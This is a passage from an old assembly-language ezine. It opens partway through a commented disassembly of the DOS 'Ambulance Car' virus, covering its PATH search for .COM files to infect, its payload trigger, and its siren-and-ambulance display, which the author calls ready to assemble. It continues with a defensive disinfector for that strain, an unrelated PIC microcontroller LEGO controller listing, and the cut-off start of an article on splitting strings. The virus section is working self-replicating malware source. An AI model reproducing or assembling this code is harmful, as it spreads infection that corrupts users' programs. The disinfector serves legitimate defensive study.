;          N BYTEs ASCIIZ full pathname of program owning this environment
;                  (other strings may follow)

                xor        bx, bx                    ; Point to the first character
check_if_PATH:
                mov        ax, es:[bx]
                cmp        ax, 'AP'
                jne        not_PATH
                cmp        word ptr es:[bx+2], 'HT'
                je        PATH_found
not_PATH:
                inc        bx
                or        ax, ax                    ; Check if both     AH and AL    are
                jnz        check_if_PATH            ;  equal  to zero  (meaning the
                                                ;  standard     environment  block
                                                ;  is over)

; Setup to check in the current directory

check_cur_dir:
                lea        di, [si+file_mask-4]    ; Point to file mask holder
                jmp        short find_file

; Find a directory in the PATH

PATH_found:
                add        bx, 5                    ; Point to after 'PATH='

find_dir:
                lea        di, [si+pathname-4]        ; Point to PATH name holder

get_character:
                mov        al, es:[bx]
                inc        bx
                or        al, al                    ; Are  we  at the  end of  this
                jz        patch_dir                ;  PATH string?

                cmp        al, ';'                    ; Is  this    a  PATH      directory
                je        check_if_this_one        ;  separator?

                mov        [di], al                ; Write this  character     to the
                inc        di                        ;  PATH name holder
                jmp        short get_character

check_if_this_one:
                cmp        byte ptr es:[bx], 0        ; Are  we  at the  end of  this
                je        patch_dir                ;  PATH string?

                shr        bp, 1                    ; Get  rid    of    the     first    two
                shr        bp, 1                    ;  lower  bits,      because  it's
                                                ;  already known that  at least
                                                ;  one them is set

; Which directory to choose
;
; Probability of  infecting in the found directory    (none of  the first     two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for another directory where to infect (one or both of the first two
;  lower bits of BP being set) is 3/4 (75%)

                test    bp, 00000011b            ; Check if we are to search for
                jnz        find_dir                ;  files in this directory or
                                                ;  not

patch_dir:
                cmp        byte ptr [di-1], '\'    ; Does    the     directory    already
                je        find_file                ;  have an ending '\'?

                mov        byte ptr [di], '\'        ; If not, then add one
                inc        di

; Find a file to infect

find_file:
                push    ds
                pop        es
                mov        [si+filename_ptr-4], di ; Save current    location within
                                                ;  the pathname/file_mask

                mov        ax, '.*'                ; Set file mask
                stosw
                mov        ax, 'OC'
                stosw
                mov        ax, 'M'
                stosw

                push    es
                mov        ah, 2Fh                    ; Get    Disk  Transfer    Address
                int        21h                        ;  (DTA)
                                                ;  [returns ES:BX -     Address of
                                                ;    current DTA]

                mov        ax, es
                mov        word ptr [si+DTA_seg-4], ax        ; Save DTA segment
                mov        word ptr [si+DTA_off-4], bx        ; Save DTA offset
                pop        es

                lea        dx, [si+new_DTA-4]        ; Setup new DTA

                mov        ah, 1Ah                    ; Set Disk Transfer Address
                int        21h                        ;  [on entry DS:DX - Address of
                                                ;    DTA]

                lea        dx, [si+file_mask-4]    ; Setup     file  mask      (with     or
                                                ;  without a PATH directory)
                xor        cx, cx                    ; Search for normal files only

                mov        ah, 4Eh                    ; Find First Matching File
                int        21h                        ;  [on     entry     CX      -       File
                                                ;    attribute; DS:DX -    pointer
                                                ;    to filespec (ASCIIZ string)

                jnc        file_found                ; File found? (and no errors?)

; If no file found, then clear the file mask

                xor        ax, ax
                mov        word ptr [si+file_mask-4], ax
                jmp        short restore_DTA

; Check if we are to infect this file or find another one
;
; Probability of  keeping the found     file is 1/8 (12.5%)  while probability     of
;  searching for another one is 7/8 (87.5%)

file_found:
                push    ds
                mov        ax, BDA_addr
                mov        ds, ax

                ror        bp, 1
                xor        bp, ds:BDA_timer_counter
                pop        ds

                test    bp, 00000111b
                jz        file_picked                ; Keep this file?
                                                ; If not, then...

                mov        ah, 4Fh                    ; Find Next Matching File
                int        21h

                jnc        file_found                ; File found? (and no errors?)

; Either a file was picked or no more files where found (so keep last one)

file_picked:
                mov        di, [si+filename_ptr-4] ; Point to after path, if any
                lea        bx, [si+f_name-4]

; Copy the file name of the found file to our filename/pathname holder

store_filename:
                mov        al, [bx]
                inc        bx
                stosb
                or        al, al                    ; Is the file name over?
                jnz        store_filename            ; If not,  then copy  the  next
                                                ;  character

restore_DTA:
                mov        bx, word ptr [si+DTA_off-4]        ; Get old DTA offset
                mov        ax, word ptr [si+DTA_seg-4]        ; Get old DTA segment
                push    ds
                mov        ds, ax
                mov        ah, 1Ah                    ; Set Disk Transfer Address
                int        21h
                pop        ds

                retn

search            endp


; Check if payload will be shown or not
;--------------------------------------
payload            proc    near

; Check if payload will be shown
;
; The  payload    will  be shown    only  when the    counter-of-opened-files matches
;  ...x110 (in binary)    which happens at:  6, 14, 22, 30, 38, ... 65534.  Then,
;  when the counter reaches its limit (65535) and goes back to zero, everything
;  starts again. So probability of the payload being shown is 1/8 (12.5%) and
;  of not is 7/8 (87.5%)

                push    es
                mov        ax, word ptr [si+counter-4]
                and        ax, 00000111b
                cmp        ax, 00000110b            ; Show    payload      every      eight
                jne        exit_payload            ;  (starting  with    the     sixth)
                                                ;  time

; Did we already show the payload? (since the computer was (re)booted)

                mov        ax, BDA_addr
                mov        es, ax
                mov        ax, es:BDA_LPT3_port_addr
                or        ax, ax                    ; If the  LPT3 port     is in use,
                jnz        exit_payload            ;  don't show payload

; Mark LPT3 port as in use, so that the payload won't be shown again

                inc        word ptr es:BDA_LPT3_port_addr
                call    show_payload

exit_payload:
                pop        es

                retn

payload            endp


; Setup and show the 'ambulance car' payload
;-------------------------------------------
show_payload    proc    near

; Check video mode
;
; Text mode 3 (80x25) - video buffer address = 0B800h
; Text mode 7 (80x25) - video buffer address = 0B000h

                push    ds
                mov        di, 0B800h
                mov        ax, BDA_addr
                mov        ds, ax
                mov        al, ds:BDA_video_mode
                cmp        al, 7                    ; Check which  video mode we're
                jne        setup_video_n_tune        ;  on,    if not    Monochrome text
                mov        di, 0B000h                ;  mode 7, assume mode 3

setup_video_n_tune:
                mov        es, di
                pop        ds
                mov        bp, 0FFF0h                ; Setup number of tones to play
                                                ;  (will increment up to 50h)

setup_animation:
                mov        dx, 0                    ; Setup ambulance_data column
                mov        cx, 16                    ; Number of characters that make
                                                ;  up one ambulance_data line

do_ambulance:
                call    show_ambulance            ; Print the ambulance to screen
                inc        dx
                loop    do_ambulance

                call    play_siren                ; Play    a tone    of the    'siren'
                call    wait_tick                ;  and wait for a tick

                inc        bp
                cmp        bp, 50h                    ; Already played the 'ambulance
                jne        setup_animation            ;  siren' tune 12 times?

                call    speaker_off                ; If yes, then turn speaker off
                push    ds
                pop        es

                retn

show_payload    endp


; Turn the PC speaker off
;------------------------
speaker_off        proc    near

; Turn off the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; (see description below)

                in        al, 61h
                and        al, 11111100b    ; Disable timer channel 2 and  'ungate'
                out        61h, al            ;  its output to the speaker

                retn

speaker_off        endp


; Turn on the speaker and play the "ambulance siren" sound
;------------------------------------------------------------
play_siren        proc    near

; Select tone frequency to generate
;
; Tone frequency is selected by means of the 3rd least significant bit of BP:
;
; Bit(s)                        Description
; ------                        -----------
; ... 3 2 1 0
; ... x 0 x x                    Play 1st tone frequency
; ... x 1 x x                    Play 2nd tone frequency
;
; If we consider A to be  the 1st tone and B to be    the 2nd tone then the whole
;  'ambulance siren' tune will be: (AAAABBBB) x 12

                mov        dx, 07D0h        ; "ambulance siren" 1st tone frequency
                test    bp, 00000100b    ; Check if    we are    to play
                jz        speaker_on        ;  the first or     the second
                                        ;  tone frequency
                mov        dx, 0BB8h        ; "ambulance siren" 2nd tone frequency

; Turn on the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 1                Timer 2 gate to speaker enable
; . . . . . . 1 .                Speaker data enable
; x x x x x x . .                Other non-concerning fields

speaker_on:
                in        al, 61h
                test    al, 00000011b    ; If speaker is already on, then go and
                jnz        play_tone        ;  play the sound tone
                or        al, 00000011b    ; Else,     enable     timer    channel     2    and
                out        61h, al            ; 'gate' its output to the speaker

; Program the PIT
;
; 8253 PIT - Programmable Interval Timer
; Port 43h, 8253 Mode Control Register
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 0                16 binary counter
; . . . . 0 1 1 .                Mode 3, square wave generator
; . . 1 1 . . . .                Read/Write LSB, followed by write of MSB
; 1 0 . . . . . .                Select counter (channel) 2

                mov        al, 10110110b    ; Set 8253 command register
                out        43h, al            ;  for mode 3, channel 2, etc

; Generate a tone from the speaker
;
; 8253 PIT - Programmable Interval Timer
; Port 42h, 8253 Counter 2 Cassette and Speaker Functions

play_tone:
                mov        ax, dx
                out        42h, al            ; Send LSB (Least Significant Byte)
                mov        al, ah
                out        42h, al            ; Send MSB (Most Significant Byte)

                retn

play_siren        endp


; Show the 'ambulance car'
;-------------------------
show_ambulance    proc    near

                push    cx
                push    dx

                lea        bx, [si+ambulance_data-4]
                add        bx, dx            ; Setup     which     ambulance_data     column
                                        ; were going to print

                add        dx, bp            ; Don't show the ambulance_data columns
                or        dx, dx            ;  which aren't still visible
                js        ambulance_done

                cmp        dx, 50h            ; Check if the column we're printing is
                jae        ambulance_done    ;  past the screen limit
                                        ; If yes,  then the don't print it

                mov        di, 3200        ; Point to    beginning of  screen's 64th
                                        ;  line

                add        di, dx            ; Point to the column we're supposed to
                add        di, dx            ;  be printing at

                sub        dx, bp            ; Restore to initial column value

                mov        cx, 5            ; Set it up so we're in the first line

decode_character:
                mov        ah, 7            ; Set color attribute to white

; Decode the character
;
; It's really pretty ingenius,    each character is encoded in a way, so that for
;  each line beyond the first one that    character is incremented by one and for
;  each column    beyond the    first the  same thing happens.    So taken  that into
;  account it's not difficult to  understand how it all works and how to decode
;  the ambulance_data

                mov        al, [bx]        ; Get the character
                sub        al, 7
                add        al, cl            ; Account for which line we're in
                sub        al, dl            ; Account for which column we're in

                cmp        cx, 5            ; Are we in the first line?
                jne        print_character ; If we are, then...

                mov        ah, 15            ; Set color attribute to high-intensity
                                        ;  white

                test    bp, 00000011b    ; Is this the  ending tone of a AAAA or
                                        ;  BBBB tune sequence?
                jz        print_character ; If not,  then go ahead  and print the
                                        ;  'siren' characters

                mov        al, ' '            ; Else,     replace  them    with a ' '    (to
                                        ;  accomplish the visual 'siren' effect

print_character:
                stosw                    ; Print the character to screen
                add        bx, 16            ; Point to next     ambulance_data line
                add        di, 158            ; Point to next screen line
                loop    decode_character

ambulance_done:
                pop        dx
                pop        cx

                retn

show_ambulance    endp


; Wait for one tick (18.2 per second) to pass
;--------------------------------------------
wait_tick        proc    near

                push    ds
                mov        ax, BDA_addr
                mov        ds, ax
                mov        ax, ds:BDA_timer_counter    ; Get ticks since midnight
check_timer:
                cmp        ax, ds:BDA_timer_counter    ; Check     if     one  tick    has
                je        check_timer                    ;  already passed
                pop        ds

                retn

wait_tick        endp


;--- Data from here below

ambulance_data:
   first_line    db        22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh
                db        2Dh, 2Eh, 2Fh, 30h, 31h
   second_line    db        23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h
                db        0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h
   third_line    db        24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h
                db        0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h
   fourth_line    db        25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h
                db        0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh
   fifth_line    db        26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh
                db        0EFh, 0F0h, 32h, 62h, 34h, 0F4h

; Here's how the ambulance looks - see under DOS (box):
;
;         \|/
; ������������
; ����� ����  \
; ���������������
; �� OO ����� O �

counter            dw        9

jump_code:
near_jump        db        0E9h
relative_offset db        36h, 00h

first_3bytes    db        3       dup       (?)

file_handle        dw        ?

virus_body:

original_3bytes db        0CDh, 20h                ; 'int 20h' opcode
                db        90h                        ; 'nop' opcode


;--- Stuff that gets saved along with the virus ends here

six_bytes        db        6        dup        (?)

filename_ptr    dw        ?

DTA_seg            dw        ?
DTA_off            dw        ?

file_mask:
filename:
pathname        db        6        dup        (?)
                db        7        dup        (?)
                db        67        dup        (?)

new_DTA:
   reserv        db        21        dup        (?)
   f_attr        db        ?
   f_time        dw        ?
   f_date        dw        ?
   f_size        dd        ?
   f_name        db        13        dup        (?)
   filler        db        85        dup        (?)


_TEXT            ends
                end        ambulance_car
---------------------------------------------------------------------------8<--


Special Thanks
--------------
I would like to thank Cicatrix for sending me his collection of 'Ambulance Car'
strains, so that I would have more than two variants to study and compare.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    'Ambulance Car' Disinfector
                                                    by Chili


Since  I  provided a  ready-to-be-assembled     virus    in    the      "'Ambulance  Car'
Disassembly"  article,    I decided to  also write a bonus  article with    a basic
disinfector for it.     Please note that this disinfector doesn't locate and clean
all existing 'Ambulance Car' strains,  though it does work on more than half of
the     strains I have     (thanks Cicatrix).     It is only     intended to work  with the
strain I provided,    so no assurances are given as to whether it will do the job
or not with other strains  (it also works with the    'RedXAny' strain look-alike
and with the tamed version that only displays the payload -     this tamed version
really isn't a virus since    it doesn't replicate and so F-PROT won't report it;
the disinfector does report and clean it though).

An infected file  can easily be cleaned by hand,  so you should try that first.
The disinfector     will scan all .COM files  in the current  directory for  three
things:     1.     the '0E9h' near jump code    (other strains may have the '0EBh' jump
code  -     this won't     detect them!);     2.     the delta    offset calculation    routine
pointed to by the near jump;  3. the ambulance data at the end of the virus (if
you change    this into something     else the disinfector will    report this file as
suspicious). Upon a suspicious or infected file report the user will be given a
chance to clean it or continue on to the next file.

And here is the disinfector:

[NOTE: F-PROT will    report this     as a new or modified  variant of SillyC  -     go
       figure!]

--8<---------------------------------------------------------------------------

; 'Ambulance Car' Disinfector
; KILLREDX by Chili for APJ #6
; Assemble with (TASM 4.1):
;        tasm /ml /m2 killredx.asm
;        tlink /t killredx.obj


LF                equ        0Ah                ; 'Line Feed' ASCII code
CR                equ        0Dh                ; 'Carriage Return' ASCII code


_TEXT            segment word public 'code'
                assume    cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                org        100h

killredx        proc    far

;--- Print program identification message

                lea        si, killredx_msg
                call    print_ASCIIZ

;--- Find first .COM file

                lea        dx, com_mask
                xor        cx, cx
                mov        ah, 4Eh
                int        21h
                jnc        open_file
                jmp        exit

open_file:

;--- Print found file's name

                lea        si, newline_msg
                call    print_ASCIIZ
                mov        si, 9Eh
                call    print_ASCIIZ

;--- Open found file

                mov        dx, 9Eh
                mov        ax, 3D02h
                int        21h
                jnc        read_jump

;--- Print open error message

                lea        si, open_msg
                call    print_ASCIIZ
                jmp        find_next

read_jump:

;--- Read jump code

                xchg    ax, bx
                mov        cx, 3
                lea        dx, jump_code
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        check_jump
                jmp        close_file

check_jump:

;--- Compare with known virus' jump code

                cmp        byte ptr [jump_code], 0E9h
                je        read_displacement
                jmp        close_file

read_displacement:

;--- Move file pointer to jump offset

                mov        dx, word ptr [jump_code+1]
                add        dx, 3
                xor        cx, cx
                mov        ax, 4200h
                int        21h

;--- Read displacement calculation code

                mov        cx, 7
                lea        dx, displace_code
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        check_displacement
                jmp        close_file

check_displacement:

;--- Compare with known virus' displacement calculation code

                cmp        word ptr [displace_code], 01E8h
                jne        exit_check
                cmp        word ptr [displace_code+2], 0100h
                jne        exit_check
                cmp        word ptr [displace_code+4], 815Eh
                jne        exit_check
                cmp        byte ptr [displace_code+6], 0EEh
                jne        exit_check
                jmp        read_data
exit_check:
                jmp        close_file

read_data:

;--- Move file pointer to supposed data location

                mov        cx, 0FFFFh
                mov        dx, 0FFF1h
                mov        ax, 4202h
                int        21h

;--- Read ambulance data

                mov        cx, 2
                lea        dx, ambulance_data
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        check_data
                jmp        close_file

read_error:

;--- Print read error message

                lea        si, read_msg
                call    print_ASCIIZ
                jmp        close_file

check_data:

;--- Compare with know virus' ambulance data

                cmp        word ptr [ambulance_data], 0F434h
                jne        suspicious

;--- Print file infected or suspicious message

                lea        si, infected_msg
                jmp        askto_clean
suspicious:
                lea        si, suspicious_msg

askto_clean:

;--- Print and read answer to whether clean file or not

                call    print_ASCIIZ
                mov        ah, 08h
                int        21h
                cmp        al, 'y'
                je        clean_file
                cmp        al, 'Y'
                je        clean_file
                jmp        close_file

clean_file:

;--- Move file pointer to supposed original bytes location

                mov        cx, 0FFFFh
                mov        dx, 0FFFDh
                mov        ax, 4202h
                int        21h

;--- Read host's original (first 3) bytes

                mov        cx, 3
                lea        dx, original_bytes
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        write_original
                jmp        close_file

write_original:

;--- Move file pointer to beginning of file

                xor        cx, cx
                xor        dx, dx
                mov        ax, 4200h
                int        21h

;--- Write original bytes

                mov        cx, 3
                lea        dx, original_bytes
                mov        ah, 40h
                int        21h
                jc        write_error
                cmp        ax, cx
                je        truncate_file

write_error:

;--- Print write error message

                lea        si, write_msg
                call    print_ASCIIZ
                jmp        close_file

truncate_file:

;--- Move file pointer to virus' jump offset (real virus start)

                mov        dx, word ptr [jump_code+1]
                add        dx, 3
                xor        cx, cx
                mov        ax, 4200h
                int        21h

;--- Truncate file

                mov        cx, 0
                mov        ah, 40h
                int        21h
                jc        write_error
                cmp        ax, cx
                jne        write_error

                lea        si, disinfected_msg
                call    print_ASCIIZ

close_file:

;--- Close file

                mov        ah, 3Eh
                int        21h

find_next:

;--- Find next matching file

                mov        ah, 4Fh
                int        21h
                jc        exit
                jmp        open_file

exit:

;--- Exit to DOS

                lea        si, newline_msg
                call    print_ASCIIZ
                retn

killredx        endp


print_ASCIIZ    proc    near

;--- Print an ASCIIZ string

                lodsb
                cmp        al, 0
                je        end_ASCIIZ
                xchg    al, dl
                mov        ah, 02h
                int        21h
                jmp        print_ASCIIZ
end_ASCIIZ:
                retn

print_ASCIIZ    endp


killredx_msg    db        "'Ambulance Car' Disinfector", LF, CR
                db        "KILLREDX by Chili for APJ #6", LF, CR, 0
newline_msg        db        LF, CR, 0
infected_msg    db        "  Infected. Clean [y/n]?", 0
suspicious_msg    db        "  Suspicious. Attempt to clean� (� WARNING: file may "
                db        "be corrupted if infected by an unknown/unsupported "
                db        "strain of Ambulance Car) [y/n]?", 0
disinfected_msg db        LF, CR, "  Disinfected.", 0
open_msg        db        LF, CR, "  [ERROR: opening file]", 0
read_msg        db        LF, CR, "  [ERROR: reading from file]", 0
write_msg        db        LF, CR, "  [ERROR: writing to file]", 0
com_mask        db        "*.COM", 0
jump_code        db        3        dup        (?)
displace_code    db        7        dup        (?)
ambulance_data    dw        ?
original_bytes    db        3        dup        (?)

_TEXT            ends
                end        killredx
---------------------------------------------------------------------------8<--


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                           Assembling for PIC's
                                                           Jan Verhoeven


Below is a piece of assembly language for the MicroChip PIC processor. This
particular program will flash some LED's and activate some relays based on the
status of some control-inputs. The target MCU was the PIC 16C54, one of the
most simple chips in that range.

To give some indication of what we're upto:

  RAM                 25 bytes
  ROM                512 words (of 12 bits each)
  I/O                 12 bits
  Clockspeed          8 kHz (this project, max = 4 MHz)
  Instructions         33
  On-Chip-Stack          2 levels

Compare this to a modern PC clone....


RISC and Harvard architecture.
------------------------------
The PIC line of MCU's are RISC chips, so they use the Harvard architecture,
and one of the results is that they have different code- and data-memories.

Higher PIC's have more features, like INTerrupt sources on 4 or more pins,
internal interrupts etcetera. All models have a watchdogtimer (WDT) which
needs to be reset regularly (if enabled) else the MCU will reset itself.


The PIC registers.
------------------
The register architecture of the PIC is somewhat odd to Intel programmer's but
programming resembles that of the Hewlett Packard HP 11 range of calculators.

Here is an overview of the registerset. Microchip refers to this as the
"register file".

    file address          name                    comment
    ------------        --------------            --------------------
        00                indirect calls            not a real register!
        01                RTCC                    timer counter
        02                PC (or IP)                lower 8 bits of it
        03                STATUS                    flags register
        04                FSR                        bank select of PIC 16C57
        05                Port A                    has 4 I/O lines
        06                Port B                    has 8 I/O lines
        07                Port C                    8 I/O, only 16C55 and 16C57
                                                GP register on 'C54 and 'C56
        08                GP register                General purpose register
        ..                ..                        ..
        1F                GP register                General purpose register

Besides these "transparant registers" there are also some hidden registers
(which also are write only...) for processor control. These are:

        TRISA            The "tristate A/B/C" registers determine the status
        TRISB            of each pin of the I/O ports.
        TRISC            A "1" makes it "input" and a "0" makes it an output.

        OPTION            is for controlling the WDT and the RTCC

And there's the ubiquitous "W" register. This is the "Working register" and is
used to haul data back and forth. PIC registers (or "files") cannot process
constants (or "literals"). This can only be done with the W-file. It takes
some getting used to, but the concept is simple and straightforward and
eventually you will get used to it and learn to appreciate it.

From that moment on, you will only have to get used to the fact that data is
nbot always ending up where you would like to have it. All instructions
between W and F (any register or file) end with a "d" option. If "d" is a "1",
the destination is the file F, if "d" is "0", the result will be stored in the
W file...
This took me some time to get used to and still is the main source of errors.
Apart from having selected the wrong osciallator and not disabling the WDT....


The PIC instructions.
---------------------
The instructions for the PIC 16C54 are as follows:

    mnemonic            description
    ----------------    -----------------------------------------
    ADDWF    F, d        d := W + F
    ANDLW    k            W := W AND k
    ANDWF    F, d        d := W AND F
    BCF        F, b        bit b in F is cleared    (i.e. made zero)
    BSF        F, b        bit b in F is set        (i.e. made one)
    BTFSC    F, b        if bit b in F is CLEAR, skip next instruction
    BTFSS    F, b        if bit b in F is SET, skip next instruction
    CALL    k            push PC, PC := k
    CLRF    F            Clear file F
    CLRW                Clear file W
    CLRWDT                Clear Watchdogtimer
    COMF    F            F := NOT F                (1's complement)
    DECF    F, d        d := F - 1
    DECFSZ    F, d        d := F - 1; If 0 => skip next instruction
    GOTO    k            PC = k
    INCF    F, d        d := F + 1
    INCFSZ    F, d        d := F + 1; If 0 => skip next instruction
    IORLW    k            W := W OR k
    IORWF    F, d        d := W OR F
    MOVF    F, d        d := F            (zero flag affected)
    MOVLW    k            W := k
    MOVWF    F            F := W
    NOP                    No operation
    OPTION                OPTION := W
    RETLW    k            W := k, pop PC
    RLF        F, d        d := rotate left through carry (F)
    RRF        F, d        d := rotate right through carry (F)
    SLEEP                enter powerdown mode
    SUBWF    F, d        d := F - W                (2's complement)
    SWAPF    F, d        d := swap-nibbles (F)
    TRIS    F            TRIState information for I/O pins
    XORLW    k            W := W XOR k
    XORWF    F, d        d := W XOR F

Especially the "F, d" construct takes some getting used to.

Below is the source for the "LEGO controller":

--------------------------------------------------------------------------
title    "LEGO 003"
subtitl "control LEGO technic devices"

LIST    P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80
PIC54    equ        1FFH            ; Define Reset Vectors

RTCC    equ        1h                ; define register designators
PC        equ        2h                ; the program counter is a register as well
STATUS    equ        3h                ; F3 Reg is STATUS Reg.
PORT_A    equ        5h
PORT_B    equ        6h                ; I/O Port Assignments

RTCC_tc equ        0Dh                ; time constant for RTCC
count_1 equ        0Eh                ; delay counters and GP registers
count_2 equ        0Fh

file    equ        1
w        equ        0

flag_0    equ        0                ; input bits in RA port
flag_1    equ        1
flag_2    equ        2
flag_3    equ        3

LED_0    equ        0                ; status led 1, in RB Port
LED_1    equ        1                ; status led 2
RL_1    equ        2                ; relays 1 - 3
RL_2    equ        3
RL_3    equ        4
s_clk    equ        5                ; s_clk input
s_data    equ        6                ; s_data input
go        equ        7

delay    movlw    .100            ; mov W with 100 decimal
        movwf    count_1            ; xfer W to register
dela_1    clrf    count_2            ; count_2 = 0
dela_2    decfsz    count_2, file    ; count_2 = count_2 - 1
        goto    dela_2            ; skip this instruction if count_2 = 0, ...
        decfsz    count_1, file    ; ... ending here: count_1 = count_1 - 1
        goto    dela_1            ; skip this instruction when count_1 = 0
        retlw    0                ; ending here, if so.

flash    bcf        PORT_B, LED_1    ; flash LED's 0 and 1 as an acknowledgement
        bsf        PORT_B, LED_0    ; activate the LED's.
        call    delay            ; wait a while
        bcf        PORT_B, LED_0    ; toggle the LED's
        bsf        PORT_B, LED_1
        call    delay            ; wait a second!
        bcf        PORT_B, LED_1    ; turn LED_1 off as well.
        retlw    0                ; return to caller with W = 0

RT_chk    clrwdt                    ; clear the watchdog timer
        btfsc    RTCC, 7            ; RELAY_3 follows bit7 of RTCC
        bcf        PORT_B, RL_3
        btfss    RTCC, 7
        bsf        PORT_B, RL_3
        movf    RTCC, w
        skpz                    ; internal macro for BTFSS    STATUS, 2
        retlw    0
        movf    RTCC_tc, w        ; if
        movwf    RTCC
        retlw    0

start    clrf    RTCC
        clrf    RTCC_tc            ; clear RTCC and RTCC time constant
        movlw    B'00001111'
        tris    PORT_A            ; define port A as inputs
        movlw    B'11100000'
        tris    PORT_B            ; define port B as I/O
        movlw    B'00110111'
        option                    ; define state of WDT, RTCC and prescaler
        movlw    B'00011100'
        movwf    PORT_B            ; initialize port B
        call    flash            ; signal READY
        call    flash
        btfss    PORT_B, s_clk    ; if s_clkline low, check for mode 2 request
        goto    m_chk
repeat    clrwdt                    ; clear watchdog timer
        call    flash
        movf    PORT_A, w        ; read port A into W
        andlw    3                ; mask off sensor inputs
        skpnz                    ; skip next instruction if NonZero
        goto    set_tc            ; flag_0 and _1 zero => define RTCC time constant
        btfsc    PORT_A, flag_0
        goto    t_left
        btfsc    PORT_A, flag_1
        goto    t_right
        movf    PORT_B, w
        andlw    s_clk + s_data + go
        skpnz                    ; if no RESET condition, skip
        goto    start
        call    RT_chk
        goto    repeat

t_left    btfsc    PORT_A, flag_2    ; if in end position, do not turn at all
        goto    l_exit
        bcf        PORT_B, RL_1    ; else set direction for Turn Left
        bsf        PORT_B, RL_2
        bsf        PORT_B, LED_0    ; show direction with LED's
        bcf        PORT_B, LED_1
chk_fl2 btfsc    PORT_A, flag_2    ; wait until home-position is reached
        goto    l_exit            ; if so, get out
        call    RT_chk            ; if not, check again
        goto    chk_fl2            ; until done
l_exit    bsf        PORT_B, RL_1    ; release relay 1
        bcf        PORT_B, LED_0    ; extinguish light 0
        goto    repeat            ; jump back

t_right btfsc    PORT_A, flag_3    ; if in end position, do not turn at all
        goto    r_exit
        bcf        PORT_B, RL_2    ; else set direction for Turn Right
        bsf        PORT_B, RL_1
        bsf        PORT_B, LED_1    ; show direction with LED's
        bcf        PORT_B, LED_0
chk_fl3 btfsc    PORT_A, flag_3    ; wait until home position reached
        goto    r_exit
        call    RT_chk
        goto    chk_fl3
r_exit    bsf        PORT_B, RL_2    ; deactivate lights and relays
        bcf        PORT_B, LED_1
        goto    repeat

m_chk    clrf    count_1            ; check inputs and make sure there's no glitch
        clrf    count_2
m_chk_1 btfss    PORT_B, s_clk
        decf    count_1, file    ; count pulses s_clkline = low
        decfsz    count_2, file
        goto    m_chk_1
        movf    count_1, w        ; w = low-pulses
        subwf    count_2, w        ; if count_1 <> count_2, glitch occurred
        skpz
        goto    start

set_tc    movf    RTCC, w            ; move current value of RTCC
        movwf    RTCC_tc            ; to time constant register
        goto    repeat

        org        PIC54            ; goto highest word in code space
        goto    start            ; and place the reset vector.

        end

--------------------------------------------------------------------------

If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional
jumps may ring a bell. I don't know how the HP machines handle these jumps,
but the PIC line does the following:

      condition            action by PIC
      ---------            -----------------------------------
        FALSE            execute next instruction
        TRUE            replace next instruction with a NOP

This enables the programmer to make 100% accurate timingloops since there is
no difference between a FALSE and a TRUE condition.

The size of this piece of code is easy to calculate: each line with an
mnemonic is one instructionword. This makes 115 words from the 512 word
program memoryspace, so we have nearly 400 instructionwords wasted.

The PIC's are marvelous chips to bridge the gap between lots and lots of TTL
chips and the overkill of a microcontroller unit with separate RAM, ROM and
I/O. If you want to find out more of this kind of CPU's, visit the website at

        http://www.microchip.com

for PDF datasheets and more. Scenix also has a range of clones out, right now.
They are software compatible but offer more hardware features. Which is not
difficult since the codeword in the design of the PIC's seemed to have been
KISS.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                              Splitting Strings
                                                              by mammon_

Those familiar with Perl will undoubtedly have used its split() function, which
takes a single string and splits it into multiple strings or into an array,
based on a delimiter character specified in the call. Typical invocations of
split() would be:

     ($field1, $field2, $junk) = split(':', $line);
     @array = split(' ', $line);

In the first line, the source string is split into a maximum of 3 substrings,
creating a new string each time it encounters a colon character; note that the
third string, $junk, contains the entire rest of the string -- only the first 2
colons will be parsed. In the second line, an array of strings is created by
splitting the source string at the space character; since the number of destin-
ation strings is not specified, the array will contain one element for each
substring [read: each string created by splitting the original at a whitespace
character].

Strings and string parsing are notably tedious in assembly. Once learning Perl,
I found that the pseudocode for many of my asm programs started to include a
few calls to 'split', since it is a handy one-line method of string parsing,
applicable to processing command lines, user input, and data files. As a result,
it quickly became necessary to write such a routine.

Being that asm has no inherent array or string tokenizing support, there are
many possible approaches to string splitting. Since the most immediate problem
is that the split() routine does not know in advance how many substrings it
will be creating, there is a temptation to code a strtok() replacement, such
that the first call returns the first substring, and subsequent calls each
return the next substring until the end of the string has been reached:

          mov ecx, ptrArray
          push dword ptrString
          push dword [delimiter]
          call split
          mov [ecx], eax
.loop:
          call split
          cmp eax, 0
          je .end
          mov [ecx], eax
          add ecx, 4
          jmp .loop
.end:

This allows for control over the number of substrings created by only calling
